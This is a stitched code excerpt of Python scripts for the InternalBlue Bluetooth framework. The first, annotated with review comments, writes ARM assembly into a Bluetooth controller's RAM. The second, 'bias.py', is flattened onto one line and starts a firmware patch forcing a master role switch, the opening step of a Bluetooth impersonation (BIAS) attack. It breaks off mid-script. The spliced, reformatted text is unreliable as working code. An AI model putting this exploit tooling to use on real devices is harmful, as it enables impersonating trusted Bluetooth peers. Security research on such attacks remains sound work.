add r0, 2 // buffer starts at 2 with data (?)
ldr r1, =0x444e4152 // RAND
str r1, [r0]
add r0, 4 // advance buffer by 4
// send hci event
mov r0, r4 // back to buffer at offset 0
pop {r0-r4, lr}
b 0x268E // send_hci_event_without_free()
""" % (MEM_ROUNDS, MEM_RNG)
# The %-placeholders consumed by (MEM_ROUNDS, MEM_RNG) are presumably in the
# part of the snippet above this excerpt; only the tail is visible here.

# Drive the first Bluetooth controller InternalBlue can see. device_list()[0]
# raises IndexError if no device is listed, before any log message is produced.
internalblue = HCICore()
internalblue.interface = internalblue.device_list()[0][1]  # just use the first device

# setup sockets
if not internalblue.connect():
    internalblue.logger.critical("No connection to target device.")
    exit(-1)

internalblue.logger.info("installing assembly patches...")

# Install the RNG code in RAM.
# vma= must equal the address the bytes are written to: the snippet branches to
# absolute firmware addresses (b 0x268E), and ARM branch offsets are encoded
# relative to the instruction's own position.
code = asm(ASM_SNIPPET_RNG, vma=ASM_LOCATION_RNG)
if not internalblue.writeMem(
        address=ASM_LOCATION_RNG, data=code, progress_log=None):
    # NOTE(review): "error!" does not say which write failed; a message naming
    # ASM_LOCATION_RNG would make a failed run easier to diagnose.
    internalblue.logger.critical("error!")
    exit(-1)
# bias.py """ Use it with internalblue """ #!/usr/bin/python2 from pwn import * from internalblue.hcicore import HCICore internalblue = HCICore() internalblue.interface = internalblue.device_list()[0][1] # setup sockets if not internalblue.connect(): log.critical("No connection to target device.") exit(-1) log.info("BEGIN patchrom.") # patch1: make sure we always switch to master role code1 = b""" @Part 1: Make sure we always switch roles mov r6, #0x0 sub sp, #0x18 add r0, #0xc b 0x2e7ad """ addrcode1 = 0x2006d0 taddrcode1 = addrcode1 + 1 # 0x2006d1 # write code1 into addrcode1 (SRAM)